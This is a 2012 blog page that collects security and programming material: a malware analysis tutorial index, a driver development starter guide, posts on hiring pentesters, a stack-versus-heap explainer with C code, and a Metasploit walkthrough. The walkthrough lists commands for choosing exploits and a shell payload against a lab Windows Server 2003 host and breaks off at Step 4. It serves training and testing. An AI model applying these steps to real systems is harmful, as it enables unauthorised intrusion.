Monday 30 July 2012

[Tutorials] Malware Analysis Tutorials: a Reverse Engineering Approach

http://fumalwareanalysis.blogspot.com/
=====================================
 Author: Dr. Xiang Fu

Roadmap: You need to first follow Tutorials 1 to 4 to set up the lab configuration. Then each tutorial addresses an independent topic and can be completed separately (each one will have its own lab configuration instructions).

Malware Analysis Tutorial 1- A Reverse Engineering Approach (Lesson 1: VM Based Analysis Platform) 
Malware Analysis Tutorial 2- Introduction to Ring3 Debugging 
Malware Analysis Tutorial 3- Int 2D Anti-Debugging .
Malware Analysis Tutorial 4- Int 2D Anti-Debugging (Part II) 
Malware Analysis Tutorial 5- Int 2D in Max++ (Part III) .
Malware Analysis Tutorial 6- Self-Decoding and Self-Extracting Code Segment .
Malware Analysis Tutorial 7: Exploring Kernel Data Structure .
Malware Analysis Tutorial 8: PE Header and Export Table .
Malware Analysis Tutorial 9: Encoded Export Table
Malware Analysis Tutorial 10: Tricks for Confusing Static Analysis Tools .
Malware Analysis Tutorial 11: Starling Technique and Hijacking Kernel System Calls using Hardware Breakpoints .
Malware Analysis Tutorial 12: Debug the Debugger - Fix Module Information and UDD File .
Malware Analysis Tutorial 13: Tracing DLL Entry Point .
Malware Analysis Tutorial 14: Retrieve Self-Decoding Key .
Malware Analysis Tutorial 15: Injecting Thread into a Running Process .
Malware Analysis Tutorial 16: Return Oriented Programming (Return to LIBC) Attack .
Malware Analysis Tutorial 17: Infection of System Modules (Part I: Randomly Pick a Driver).
Malware Analysis Tutorial 18: Infecting Driver Files (Part II: Simple Infection)
Malware Analysis Tutorial 19: Anatomy of Infected Driver 
Malware Analysis Tutorial 20: Kernel Debugging - Intercepting Driver Loading .
Malware Analysis Tutorial 21: Hijacking Disk Driver 
Malware Analysis Tutorial 22: IRP Handler and Infected Disk Driver
Malware Analysis Tutorial 23: Tracing Kernel Data Using Data Breakpoints 
Malware Analysis Tutorial 24: Tracing Malicious TDI Network Behaviors of Max++  
Malware Analysis Tutorial 25: Deferred Procedure Call (DPC) and TCP Connection 
Malware Analysis Tutorial 26: Rootkit Configuration 
Malware Analysis Tutorial 27: Stealthy Loading of Malicious Driver  
Malware Analysis Tutorial 28: Break Max++ Rootkit Hidden Drive Protection 
Malware Analysis Tutorial 29: Stealthy Library Loading II (Using Self-Modifying APC) 
Malware Analysis Tutorial 30: Self-Overwriting COM Loading for Remote Loading DLL

Device Driver Development For Beginners

http://quequero.org/Device_Driver_Development_For_Beginners
=================================

Introduction

A short starter for people who want to begin kernel-mode development. This tutorial is a living document; from time to time I will revise and expand it.

Following a good thread on the UIC forum, opened by a beginner who wanted to know how to start with device driver development, I remembered that I had published a similar blog post on the subject a long time ago.


Development Tools

  1. WDK/DDK - the driver development kit provided by Microsoft; the latest edition can be downloaded from http://www.microsoft.com/whdc/DevTools/WDK/WDKpkg.mspx
  2. Visual Studio 2008/2010 - you can develop without VS, but I prefer the comforts of a full IDE, especially when working on complex device drivers.
  3. DDKWizard - a project-creation wizard for Visual Studio that creates projects which use the DDKBUILD scripts from OSR (also available in the download section of this site). The wizard offers several options to configure your project before it is created. Download it from http://ddkwizard.assarbad.net/
  4. VisualAssist - (optional) Visual Assist X provides productivity enhancements that help you read, write, navigate and refactor code quickly in all Microsoft IDEs. Try or buy it at http://wholetomato.com/
  5. VisualDDK - develop and debug drivers directly from Visual Studio; its authors claim a debugging speed-up of ~18x for VMware and ~48x for VirtualBox over a plain kernel debugger connection. Download and step-by-step quick start guide: http://visualddk.sysprogs.org/quickstart/
  6. Virtual Machine - you need a virtual machine for efficient driver debugging (a faulty driver takes the whole OS down, so never test on your development machine); the best options are VMware or VirtualBox.

Building a Driver Development Environment

As you can see, a comfortable driver development station is composed of a good number of components, so we need an installation order.
  • Install your IDE - Visual Studio 2008 or Visual Studio 2010
  • Install the WDK package
  • Install DDKWizard
  • Download ddkbuild.cmd and place it (usually) into C:\WinDDK
  • Following the DDKWizard PDF, add a new environment variable that points at the WDK for the OS version you are developing for, and then add a reference to ddkbuild.cmd inside the VS IDE. The DDKWizard manual is very well written.
  • After finishing the DDKWizard integration, test that your environment is correctly installed by compiling your first driver. The steps are easy: open VS and select the DDKWizard template (not EmptyDriver); you will see the skeleton of a driver. All you have to do is Build Solution; if no compile errors occur, your station is correctly installed.
  • Install the virtual machine
  • Integrate the debugging help of VisualDDK by following its step-by-step quick start guide
  • Install Visual Assist (this can be done at any moment after the VS installation)

Additional Tools

  • DeviceTree - This utility has two views: (a) one view that will show you the entire PnP enumeration tree of device objects, including relationships among objects and all the device's reported PnP characteristics, and (b) a second view that shows you the device objects created, sorted by driver name. There is nothing like this utility available anywhere else. http://www.osronline.com/article.cfm?article=97
  • IrpTracker - IrpTracker allows you to monitor all I/O request packets (IRPs) on a system without the use of any filter drivers and with no references to any device objects, leaving the PnP system entirely undisturbed. In addition to being able to see the path the IRP takes down the driver stack and its ultimate completion status, a detailed view is available that allows you to see the entire contents of static portion of the IRP and an interpreted view of the current and previous stack locations.
http://www.osronline.com/article.cfm?article=199
  • DebugMon - Displays DbgPrint messages generated by any driver in the system (or the OS itself) in the application window. Can be used either in local mode or can send the DbgPrint messages to another system via TCP/IP. http://www.osronline.com/article.cfm?article=99
  • DriverLoader - This GUI-based tool will make all the appropriate registry entries for your driver, and even allow you to start your driver without rebooting. It's even got a help file, for goodness sakes! If you write drivers, this is another one of those utilities that's a must have for your tool chest. http://www.osronline.com/article.cfm?article=157
Now you have a fully working development and debugging station.
As you can imagine, driver development means working in kernel mode, a task that is challenging, delicate and complex. A badly written driver leads to OS crashes and/or dangerous bugs: a bug or a crash in a driver used in a mission-critical application, for example in surgery, could have extremely serious consequences. A kernel driver also runs with full system privileges, so any bug in it is a potential local privilege escalation. The driver needs to be:
  • Bug free
  • Fault tolerant
  • Able to endure all stress situations
This can only be achieved by a driver coder with a broad knowledge of the following fields:
  • Hardware architecture
  • Operating system architecture
  • Kernel-mode and user-mode architecture
  • Rock-solid C language knowledge
  • Debugging ability
Here I enumerate the documentation, books and other material needed to achieve a solid background and advanced knowledge of driver coding.
Microsoft WDK Page: http://www.microsoft.com/whdc/devtools/WDK/default.mspx
It will give you information about:
  1. WDM ( Windows Driver Model)
  2. WDF (Windows Driver Foundation)
  3. IFS Kit (Installable FileSystem Kit)
  4. Driver Debugging
  5. Driver Stress Testing ( DriverVerifier tool )
PC Fundamentals: http://www.microsoft.com/whdc/system/default.mspx
Device Fundamentals: http://www.microsoft.com/whdc/device/default.mspx
These will give you a broad view of what developing a driver means, which components are touched and which aspects you need to know.
It is also obviously necessary to have a reference for the kernel-mode functions and mechanisms involved; the first and best resource is always MSDN. Here is the starting link, MSDN -> DDK:
http://msdn.microsoft.com/en-us/library/ee663300%28v=VS.85%29.aspx

How to start Learning

  • Driver Development Part 1: Introduction to Drivers
http://www.codeproject.com/KB/system/driverdev.aspx
  • Driver Development Part 2: Introduction to Implementing IOCTLs
http://www.codeproject.com/KB/system/driverdev2.aspx
  • Driver Development Part 3: Introduction to driver contexts
http://www.codeproject.com/KB/system/driverdev3.aspx
  • Driver Development Part 4: Introduction to device stacks
http://www.codeproject.com/KB/system/driverdev4asp.aspx
  • Driver Development Part 5: Introduction to the Transport Device Interface
http://www.codeproject.com/KB/system/driverdev5asp.aspx
  • Driver Development Part 6: Introduction to Display Drivers
http://www.codeproject.com/KB/system/driverdev6asp.aspx
It is really important to emphasise memory management in kernel mode; the best starting point for these aspects are the tutorials written by four-f:

http://www.freewebs.com/four-f/
Handling IRPs: What Every Driver Writer Needs to Know http://download.microsoft.com/download/9/c/5/9c5b2167-8017-4bae-9fde-d599bac8184a/IRPs.doc

Book Resources

Tutorials are a great starting point, but a solid understanding comes from a set of more thorough treatments, hence the need for a good book collection:
  • Windows NT Device Driver Development (OSR Classic Reprints)
http://www.amazon.com/Windows-Device-Development-Classic-Reprints/dp/0976717522/ref=sr_1_2?s=gateway&ie=UTF8&qid=1285616242&sr=8-2
  • Windows®-Internals-Including-Windows-PRO-Developer
http://www.amazon.com/Windows%C2%AE-Internals-Including-Windows-PRO-Developer/dp/0735625301/ref=sr_1_1?s=gateway&ie=UTF8&qid=1285616160&sr=8-1
  • The Windows 2000 device driver book: a guide for programmers
http://www.amazon.com/Windows-2000-Device-Driver-Book/dp/0130204315
  • Undocumented Windows 2000 Secrets
http://undocumented.rawol.com/
  • Developing Drivers with WDF
http://www.microsoft.com/whdc/driver/wdf/wdfbook.mspx
  • Windows NT File System Internals, A Developer's Guide
http://oreilly.com/catalog/9781565922495

Web Resources

The first and most important resource about Windows Driver Development is OSROnline:
http://www.osronline.com/
I strongly suggest you to subscribe:
  1. The NT Insider
  2. NTDEV MailingList
  • NDIS Developer's Reference
http://www.ndis.com/
  • Information, Articles, and Free Downloads
http://www.hollistech.com/resources.htm
  • The Undocumented Functions
http://undocumented.ntinternals.net
  • Blog MSDN
http://blogs.msdn.com/iliast
  • Windows Vista Kernel Structures
http://www.nirsoft.net/kernel_struct/vista/
  • Peter Wieland's thoughts on Windows driver development
http://blogs.msdn.com/b/peterwie/
  • USB Driver Development
http://blogs.msdn.com/b/usbcoreblog/
  • Hardware and Driver Developer Blogs
http://www.microsoft.com/whdc/resources/blogs.mspx
Developer Newsgroups
  • microsoft.public.development.device.drivers
  • microsoft.public.win32.programmer.kernel
  • microsoft.public.windbg
Links
  • j00ru//vx tech blog Coding, reverse engineering, OS internals Blog
http://j00ru.vexillium.org/
  • Nynaeve
http://www.nynaeve.net/
  • DumpAnalysis Blog
http://www.dumpanalysis.org/
  • Analyze -v Blog
http://analyze-v.com/
  • Instant Online Crash Dump Analysis
http://www.osronline.com/page.cfm?name=analyze
  • Winsock Kernel (WSK)
http://msdn.microsoft.com/en-us/library/ff571084.aspx
  • Transport Driver Interface (TDI)
http://msdn.microsoft.com/en-us/library/ms819740.aspx
  • Network Driver Interface Specification (NDIS)
http://blogs.msdn.com/b/ndis/
  • System Internals
http://www.microsoft.com/whdc/system/Sysinternals/default.mspx
Driver development needs a great deal of time, patience and experience to be fully understood. In my opinion the best approach remains LbD (Learning by Doing), so read, study and develop: the more experience you build, the fewer BSODs and "strange behaviours" you will get :)



Wednesday 28 March 2012

Hiring pentesters - http://blog.pentesterlab.com

Hiring the right people is becoming harder and harder. I decided to share some tips and feedback based on a few years of reading resumes and interviewing people.

I don't think you can really have an equation to rate the right person, I think it's more like a list of things I like or dislike in a resume.

In my opinion, the best hiring process follows the following steps (for the technical side of it):
  • Review resume.
  • Technical interview.
  • Hands-on interview.
  • Drinks.
In this first post, I'm going to provide more details on how I review a resume and what affects my decision.

Pre-processing:
  • Resume looks ugly: -1
  • Obvious spelling mistakes in the resume: -3 (native speakers), -1 (others)
  • Resume sent by a recruiter: +/- 5, some recruiters can take a resume and make it look terrible or can make it look better...
  • Buzzwords in the resume: -3
  • Hotmail address: -3 ("Excuse me, are you from the past?")
  • Own domain name: +2, with own SMTP server: +3
  • Number of occurrences of the word "hack" in the resume: -1 per occurrence
  • No internet presence: +/-10, can indicate the best and the worst

Education:
  • Developer education: +2, someone who can write code will often be more useful than someone who can't
  • Learn different things at school: +3, with special points for Maths, Cryptography, Data Mining, Signal processing, Electronic, ...
  • Didn't go to high school: +/-0, some really really smart people didn't spend much time at school.

Job experiences:
  • Job hopper: -5, training people takes time (especially if you're not using our exercises), you cannot afford to hire someone who is going to leave after a year (with your company's knowledge).
  • More than 7 years working for one big company/big 4 and bragging about it: -2, if someone is not happy, he should move on, and not stay at the same place for that long
  • Worked as a developer: +2, someone who can write code will often be more useful than someone that can't.
  • Web site developer: +3, a big part of our job is web-based, knowing how to develop for the web gives people a lot of knowledge needed for penetration testing (common mistakes, ability to review code, ...).

Certifications:
  • CEH: -2, too often I have been disappointed during the technical interview by CEH holders. Most of them just want to hack stuff and don't learn properly how things work.
  • CISSP: -3, CISSP is in my opinion a good certification for people who want to show general knowledge in security... not really the kind of people a pentest company is after in my opinion.
  • ISO-2700*: -4, same as CISSP with even less technical knowledge
  • PCI-DSS: -2, not really technical but some really good people are certified.
  • All of these certifications together: -3
  • Special points for "Firstname Lastname CISSP": -4

IT knowledge:
  • Lists a tool instead of a technique: -3, "sqlmap" instead of "SQL injection"
  • Lists really old security tools: -3
  • Obvious lack of security knowledge: -10, nonsense in the resume for example
Code:
  • github profile: +5
  • github profile with projects: +5, +3 if really good code, +4 if code in different languages
  • github profile with patches for opensource projects: +5 (-3 if advisory published for silly vulnerabilities)

Vulnerabilities:
  • published a vulnerability in some project in version 0.1: -3, +3 if it's a full code review and they found "all" the bugs and report them prior to the disclosure.
  • published a stack-overflow in some Russian mp3 player: -3 (typical CEH profile)

Others:
  • References from someone: +10
  • Twitter account: +1, -1 if only chitchat, -3 if security circus, +2 if real information on vulnerabilities
  • Blog with interesting articles: +5
  • Play CTF: +5
  • Available on IRC: +2
  • Talk during conferences: +5, unless talk on SCADA: -3
  • Read Phrack: +5
  • Wrote in Phrack: +20 (Phrack is the *BIG* deal, writing in phrack shows both a lot of skills and the good attitude)
Hobbies:
  • Any achievement: +3, black belt in some martial arts, won something, ...
  • Did/do some team sports: +/- 0. to be honest I don't think most good pentesters are team players, they are more like traders, sharing information/tools with people they know/like/respect or people who share with them.


I know a lot of people won't agree with this rating, mostly because it's really subjective (and part of it is a bit trollish I guess). However, most of the time it provides a good overview of a resume... Obviously, if I get a resume that matches all these points, I will be really suspicious now :p 
 
==============================================================
 
After the first post on hiring pentesters I thought I had to keep going... A lot of people read it and apparently liked it... If you are really interested by the interview process, matasano's one is pretty impressive...

Before the interview (or even before you read the resume), it's good to have a basic opinion on someone's skills... I wrote a simple website with 20 questions to get a quick feeling of who I'm talking to.

The questions are simple but allow to detect people with no security knowledge. Below are 2 of the 20 questions so you can see what I'm talking about:
  • unmd5 is the PHP function used to retrieve the clear text of an md5? True/False
  • Windows passwords are stored in C:\Windows\System32\drivers\etc\shadow? True/False
If someone passes this test, the real technical interview can start.

As always, you will have the normal security questions (I guarantee most security companies ask for these):
  • explain a tcp handshake
  • how Windows passwords are stored?
  • what is a cookie?
  • opinion on disclosure?
From my experience, I think it's better to ask people to explain things than just to ask them what something is. You can really see what level of understanding people have of a problem...

For example, with Cross Site Scripting, you can have the following responses:
  • "it's a problem of filtering and it allows an attacker to inject script in the page"
  • "it's a problem of filtering and an attacker can display/run arbitrary code in victims' browser"
  • "it's a problem of output encoding and can be used to inject Javascript or HTML in the page sent back to victims"
  • ...
That way, you're able to see if the person really understands what's going on and how he will be able to explain it to someone else.

You need to have 2 types of questions:
  • questions based on memory: "what port is used by X", "what nmap options do you use"
  • questions based on reflection: "how will you solve that problem"

I also have my favorite set of questions:
  • "You're going to PentesterLab's website, explain what happens...", that way you can see someone's knowledge of TCP/IP, DNS, HTTP, SSL, ...
  • "What is the last cool thing you learned/read", that way you can see what people are interested in and where they're at
After this test, another interview is set up with a hands-on test (only if the person did well enough, obviously); it's currently the web application of the exercise "From SQL injection to shell" and it's used to see how people think and behave with a computer.

You can see a lot of different things:
  • what people use for desktop
  • how fast someone is with his computer
  • how people solve a problem
  • if people bring a working laptop (yes it happened, someone came to an interview with a broken gentoo...)
  • learn from people: sometimes people show you cool tricks you didn't think of
  • ...
Obviously, not everyone (actually only one person did it without any help so far) knows how to exploit a SQL injection manually (why do you think I created PentesterLab). But during the test, we help people and show how things work to see how they can learn new things and incorporate information into their way of thinking.
 

Thursday 8 March 2012

What is heap and stack?

The stack is the region of memory that holds a function's automatic data: its local variables, parameters and return address, all of which exist only while that function call is running. The heap is the region used for dynamic allocation: blocks requested at runtime (malloc() in C, new in C++ or Java) that stay allocated until the program frees them, however many function calls come and go in between.

What are the memory segments?

The distinction between stack and heap comes from how a running program's memory is laid out. A process image is commonly described in terms of these segments:
  • text (code) segment
  • data segment (initialised globals and statics) and bss segment (zero-initialised globals and statics)
  • stack segment
  • heap segment
The text segment (often called the code segment) holds the compiled machine code of the program. If you open an EXE file in Notepad you see what looks like gibberish, unreadable to a human: that is the machine code, the processor's representation of the program's instructions, including both user-defined functions and any statically linked library functions. On modern systems the text segment is mapped read-only and executable, while the stack and heap are writable and normally non-executable.
Heap and stack - what is it?
Now let's get to some details.

What is stack?

The other sections are used for data. The stack is the section of memory allocated for automatic variables: the locals and parameters of each function call.
Data on the stack is managed Last In, First Out (LIFO): storage is allocated and released only at one end, called the top of the stack, so the most recently pushed item is always the first to be popped. A dedicated register (the stack pointer) tracks the top; entering a function reserves a frame by moving that register, and returning releases the frame by moving it back.

What is heap?

The heap, on the other hand, is the area of memory used for dynamic allocation. Blocks are allocated and freed in arbitrary order, and neither the pattern nor the size of the requests is known until run time, so the allocator must keep bookkeeping data (block headers, free lists) to track which parts are in use. A program typically uses the heap for anything whose size or lifetime is not tied to a single function call.
Allocating on the stack is much faster than allocating on the heap, but the stack is small (typically a fixed size of a few megabytes per thread) and its contents become invalid as soon as the function returns.

Heap and stack from programming perspective

In C and C++ every program has exactly one function named main(), which the system calls when the program starts; it marks the entry point of the program (C# and Java use a static Main/main method for the same purpose). Before we start explaining, let's take a look at the following example:
#include <stdlib.h>
int x;                                  /* global: static storage in the data/bss segment, not the stack */
int calcSize(int n) { return n * 2; }   /* n and any locals live in calcSize()'s stack frame */
int main(void) {
   int y, size;                         /* automatic: stack storage in main()'s frame */
   char *str;                           /* the pointer itself is on the stack ... */
   str = malloc(50);                    /* ... the 50 bytes it points to are heap storage */
   size = calcSize(10);                 /* return value is copied back into a stack variable */
   free(str);                           /* heap storage must be released explicitly */
   return 0;
}
When main() starts executing, the variables declared within main() (y, size and the pointer str) are stored in main()'s stack frame.
When main() calls another function, for example calcSize(), a new frame is pushed on the stack for calcSize()'s parameters, local variables and return address. The parameters main() passes to calcSize() are stored on the stack as well (or in registers, depending on the calling convention). If calcSize() called further functions, each of them would push its own frame on top.
When calcSize() returns its value, its frame is popped: the stack pointer moves back and that space is immediately available to the next call. Nothing is erased, so the next function to occupy that region finds whatever calcSize() left there; this is why uninitialised locals contain "garbage".
Only the 50 bytes obtained from malloc() live on the heap. Heap memory is used and reused throughout program execution, and a freshly allocated block may likewise contain leftover data from its previous owner unless it was obtained with calloc() or explicitly cleared. It stays allocated until free() is called; losing the last pointer to it is a memory leak.
In languages such as Java and C#, objects are always allocated on the heap, while built-in value types (int, double, float) and method parameters are allocated on the stack. Even though objects live on the heap, the references to them are ordinary variables and, when local, are placed on the stack.
Global variables (such as x above) and static variables are in neither region: they are allocated in the data or bss segment when the program is loaded and exist for the duration of the program, which is what makes them stable storage.

Why are stack and heap important?

When a program is loaded into memory, the operating system's memory management sets up these regions for the process. Without that isolation, programs would overwrite each other's memory and leave the computer non-functional.

Heap and stack in Java

When you create an object with the new operator, for example myobj = new Object();, the object's memory is allocated on the heap. Stack memory is used for automatic variables: local variables of value type and, for objects, the local reference that points at the heap object.
Note that a declaration such as String myString; does not create a String at all; it only declares a reference (on the stack if it is a local). The String object itself is created on the heap, either by new String(...) or by a string literal, when the reference is assigned.

===========================================

The stack is the memory set aside as scratch space for a thread of execution. When a function is called, a block is reserved on the top of the stack for local variables and some bookkeeping data. When that function returns, the block becomes unused and can be used the next time a function is called. The stack is always reserved in a LIFO order; the most recently reserved block is always the next block to be freed. This makes it really simple to keep track of the stack; freeing a block from the stack is nothing more than adjusting one pointer.
The heap is memory set aside for dynamic allocation. Unlike the stack, there's no enforced pattern to the allocation and deallocation of blocks from the heap; you can allocate a block at any time and free it at any time. This makes it much more complex to keep track of which parts of the heap are allocated or free at any given time; there are many custom heap allocators available to tune heap performance for different usage patterns.

Stack:
  • Stored in computer RAM like the heap.
  • Variables created on the stack will go out of scope and automatically deallocate.
  • Much faster to allocate in comparison to variables on the heap.
  • Implemented with an actual stack data structure.
  • Stores local data, return addresses, used for parameter passing
  • Can have a stack overflow when too much of the stack is used (mostly from infinite or very deep recursion, or very large local arrays).
  • Data created on the stack can be used without pointers.
  • You would use the stack if you know exactly how much data you need to allocate before compile time and it is not too big.
  • Usually has a maximum size already determined when your program starts
Heap:
  • Stored in computer RAM like the stack.
  • Variables on the heap must be destroyed manually and never fall out of scope. The data is freed with delete, delete[] or free
  • Slower to allocate in comparison to variables on the stack.
  • Used on demand to allocate a block of data for use by the program.
  • Can have fragmentation when there are a lot of allocations and deallocations
  • In C++ data created on the heap will be pointed to by pointers and allocated with new or malloc
  • Can have allocation failures if too big of a buffer is requested to be allocated.
  • You would use the heap if you don't know exactly how much data you will need at runtime or if you need to allocate a lot of data.
  • Source of memory leaks when blocks are never freed.


Each thread gets a stack, while there's typically only one heap for the application (although it isn't uncommon to have multiple heaps for different types of allocation).

  • The OS allocates the stack for each system-level thread when the thread is created. Typically the OS is called by the language runtime to allocate the heap for the application.
  • The stack is attached to a thread, so when the thread exits the stack is reclaimed. The heap is typically allocated at application startup by the runtime, and is reclaimed when the application (technically process) exits.
  • The size of the stack is set when a thread is created. The size of the heap is set on application startup, but can grow as space is needed (the allocator requests more memory from the operating system).
  • The stack is faster because the access pattern makes it trivial to allocate and deallocate memory from it (a pointer/integer is simply incremented or decremented), while the heap has much more complex bookkeeping involved in an allocation or free. Also, each byte in the stack tends to be reused very frequently which means it tends to be mapped to the processor's cache, making it very fast.
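The two allocation disciplines described above (the stack: one pointer that is bumped and un-bumped in LIFO order, with a fixed maximum; the heap: arbitrary allocate/free order, bookkeeping, fragmentation and allocation failure) can be made concrete with two tiny allocators over fixed byte arrays. This is an added example written for this page, not code from either post quoted above; the 64-byte region sizes, the first-fit policy and the function names are my own assumptions, chosen to keep the bookkeeping visible.

```c
#include <stddef.h>
#include <stdio.h>

/* ---------- Stack: a fixed-size region managed by a single pointer ---------- */
#define STACK_SIZE 64                          /* assumed size; fixed when "the thread starts" */
static unsigned char stack_mem[STACK_SIZE];
static size_t sp = 0;                          /* bytes in use == the "top of stack" */

/* Reserve n bytes for a new frame. Returns the frame's offset, or -1 if the
 * request would exceed the fixed region: that is a stack overflow. */
long stack_push(size_t n) {
    if (n > STACK_SIZE - sp)
        return -1;
    long off = (long)sp;
    sp += n;                                   /* allocation is one addition */
    return off;
}

/* Release the most recent frame. LIFO means no search: one subtraction. */
void stack_pop(size_t n) { sp -= n; }

size_t stack_in_use(void) { return sp; }

/* ---------- Heap: a free list of holes, first-fit, must coalesce ---------- */
#define HEAP_SIZE 64                           /* assumed size */
#define MAX_HOLES 16
typedef struct { size_t off, size; } hole_t;
static hole_t holes[MAX_HOLES] = { { 0, HEAP_SIZE } };   /* initially one big hole */
static int nholes = 1;

/* Merge adjacent holes so that freed neighbours become one usable block. */
static void coalesce(void) {
    for (int merged = 1; merged; ) {
        merged = 0;
        for (int i = 0; i < nholes && !merged; i++)
            for (int j = 0; j < nholes; j++)
                if (i != j && holes[i].off + holes[i].size == holes[j].off) {
                    holes[i].size += holes[j].size;
                    holes[j] = holes[--nholes];
                    merged = 1;
                    break;
                }
    }
}

/* First-fit allocation: scan the free list for the first hole of size >= n.
 * Returns the block offset, or -1 when no single hole is big enough, which can
 * happen even when the total free space would suffice (fragmentation). */
long heap_alloc(size_t n) {
    for (int i = 0; i < nholes; i++) {
        if (holes[i].size >= n) {
            long off = (long)holes[i].off;
            holes[i].off += n;
            holes[i].size -= n;
            if (holes[i].size == 0)
                holes[i] = holes[--nholes];
            return off;
        }
    }
    return -1;
}

/* Free a block at any time and in any order; the allocator has to record the
 * hole and try to merge it with its neighbours. */
void heap_free(size_t off, size_t n) {
    if (nholes == MAX_HOLES)                   /* free list full: the hole is lost (a leak) */
        return;
    holes[nholes].off = off;
    holes[nholes].size = n;
    nholes++;
    coalesce();
}

size_t heap_free_total(void) {
    size_t t = 0;
    for (int i = 0; i < nholes; i++) t += holes[i].size;
    return t;
}

size_t heap_largest_hole(void) {
    size_t m = 0;
    for (int i = 0; i < nholes; i++) if (holes[i].size > m) m = holes[i].size;
    return m;
}

int main(void) {
    long a = stack_push(16), b = stack_push(16);
    printf("stack frames at %ld and %ld; pushing 48 more -> %ld (overflow)\n",
           a, b, stack_push(48));
    stack_pop(16); stack_pop(16);              /* frames must go in reverse order */

    long ha = heap_alloc(16), hb = heap_alloc(16), hc = heap_alloc(16);
    heap_free((size_t)hb, 16);                 /* free only the middle block */
    printf("heap blocks at %ld %ld %ld; after freeing the middle one: "
           "%zu bytes free, largest hole %zu, alloc(24) -> %ld\n",
           ha, hb, hc, heap_free_total(), heap_largest_hole(), heap_alloc(24));
    heap_free((size_t)hc, 16);                 /* neighbours coalesce into one hole */
    printf("after freeing its neighbour: largest hole %zu, alloc(24) -> %ld\n",
           heap_largest_hole(), heap_alloc(24));
    return 0;
}
```

Run it and note two things: the stack refuses the third frame outright (fixed maximum, no way to grow it from inside), and the heap refuses a 24-byte request while 32 bytes are free, because the free space is split into two 16-byte holes; only after the neighbouring block is freed and coalesced does the request succeed. Real allocators add headers and size classes on top of this, and it is exactly that per-block bookkeeping, sitting inline next to user data, that heap-overflow exploits target.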

Wednesday 29 February 2012

Penetration Testing with Metasploit Framework - Author: Dinesh Shetty

Introduction

When I say "penetration testing tool", the first thing that comes to mind is the world's largest Ruby project, with over 700,000 lines of code: Metasploit [Reference 1]. No wonder it has become the de facto standard for penetration testing and exploit development, with more than one million unique downloads per year and the world's largest public database of quality-assured exploits.

The Metasploit Framework is a program and sub-project originally developed by Metasploit LLC (acquired by Rapid7 in 2009). It was created in 2003 in Perl, but was later completely rewritten in Ruby. With the release current at the time of writing (3.7.1), Metasploit's speed of exploit development and breadth of tested modules rival its high-priced commercial counterparts.


In this article, I will walk you through a detailed step-by-step sequence of commands, along with graphical illustrations, to perform effective penetration testing using the Metasploit Framework.
 
 
Working with Metasploit

Metasploit is designed with ease of use in mind to aid penetration testers.

The Metasploit Framework follows these common steps when exploiting a target system:
  1. Select and configure the exploit: the module whose code targets a specific defect in the software running on the target. Validate whether the chosen system is susceptible to it (the check command does this for modules that implement it).
  2. Select and configure a payload: the code that will run on the target once the exploit has succeeded and given us an entry point.
  3. Select and configure the encoder, if needed, so that the payload has a better chance of evading intrusion detection systems.
  4. Execute the exploit.
 
I will be taking you through this demo in BackTrack 5 [Reference 2], so go ahead and download it if you don't already have it. The reason for using BackTrack 5 is that it ships with Metasploit already set up, together with everything else a penetration tester needs.

The Metasploit Framework has three work environments: msfconsole, the msfcli command-line interface and the msfweb interface. The primary and most widely used one is msfconsole, an efficient interactive console with its own command set and environment system.

Before executing your exploit, it is useful to understand what some Metasploit commands do. Below are the commands you will use most; graphical explanations of their output are given as we use them while exploiting some boxes later in the article.
 
  1. search <keyword>: Typing in the command 'search' along with the keyword lists out the various possible exploits that have that keyword pattern.

  2. show exploits: Typing in the command 'show exploits' lists out the currently available exploits. There are remote exploits for various platforms and applications including Windows, Linux, IIS, Apache, and so on, which help to test the flexibility and understand the working of Metasploit.

  3. show payloads: With the same 'show' command, we can also list the available payloads using 'show payloads'.

  4. show options: Typing in the command 'show options' will show you options that you have set and possibly ones that you might have forgotten to set. Each exploit and payload comes with its own options that you can set.

  5. info <type> <name>: If you want specific information on an exploit or payload, you are able to use the 'info' command. Let's say we want to get complete info of the payload 'winbind'. We can use 'info payload winbind'.

  6. use <exploit_name>: This command tells Metasploit to use the exploit with the specified name.

  7. set RHOST <hostname_or_ip>: This command will instruct Metasploit to target the specified remote host.

  8. set RPORT <host_port>: This command sets the port that Metasploit will connect to on the remote host.

  9. set PAYLOAD <generic/shell_bind_tcp>: This command sets the payload that is used to a generic payload that will give you a shell when a service is exploited.

  10. set LPORT <local_port>: This command sets the port number that the payload will open on the server when an exploit succeeds. It is important that this port number be one that can be opened on the server (i.e. it is not in use by another service and not reserved for administrative use), so set it to a random 4-digit number greater than 1024 and you should be fine. You will also have to change the number each time you successfully exploit a service.

  11. exploit: Actually exploits the service. Another version of exploit, rexploit, reloads your exploit code and then executes the exploit. This allows you to try minor changes to your exploit code without restarting the console.

  12. help: The 'help' command gives you basic information on all the commands that are not listed here.
 
Now that you are ready with all the basic commands you need to launch your exploit, let's get into action with a live target system using Metasploit.
 
 
 
Pen Testing using Metasploit
 
Here is the demonstration of pen testing a vulnerable target system using Metasploit with detailed steps.
 
Victim Machine
OS: Microsoft Windows Server 2003
IP: 192.168.42.129
 
Attacker (Our) Machine
OS: Backtrack 5
Kernel version: Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
Metasploit Version: Built-in version of Metasploit, 3.8.0-dev
IP: 192.168.42.128
 
Our objective here is to gain remote access to the given target, which is known to be running a vulnerable Windows Server 2003.

Here are the detailed steps of our attack in action.
 
 
Step 1
 
Perform an Nmap [Reference 3] scan of the remote server 192.168.42.129.

The output of the Nmap scan shows us a range of open ports, which can be seen below in Figure 1.
 
 
We notice that port 135 is open. Thus we can look for modules in Metasploit that exploit this service and gain shell access if the server is vulnerable.
 
 
Step 2:
 
Now on your BackTrack, launch msfconsole as shown below:
Application > BackTrack > Exploitation Tools > Network Exploit Tools > Metasploit Framework > msfconsole
 
 
During the initialization of msfconsole, standard checks are performed. If everything works out fine we will see the welcome screen as shown below.
 
 
 
Step 3: 
 
Now, we know that port 135 is open, so we search for a related RPC exploit in Metasploit.

To list all the exploits supported by Metasploit we use the "show exploits" command. This command lists all the currently available exploits; a small portion of the output is shown below.
 
 
As you may have noticed, the default installation of the Metasploit Framework 3.8.0-dev comes with 696 exploits and 224 payloads, which is quite an impressive stockpile; finding a specific exploit in this huge list would be a really tedious task. So we use a better option. You can either visit the link http://metasploit.com/modules/ or use the "search <keyword>" command in Metasploit to search for exploits related to RPC.

In msfconsole type "search dcerpc" to search for all the exploits related to the dcerpc keyword, as such an exploit can be used to gain access to a server with a vulnerable port 135. A list of all the related exploits is presented in the msfconsole window, shown below in Figure 5.
 
 
 
Step 4: 
 
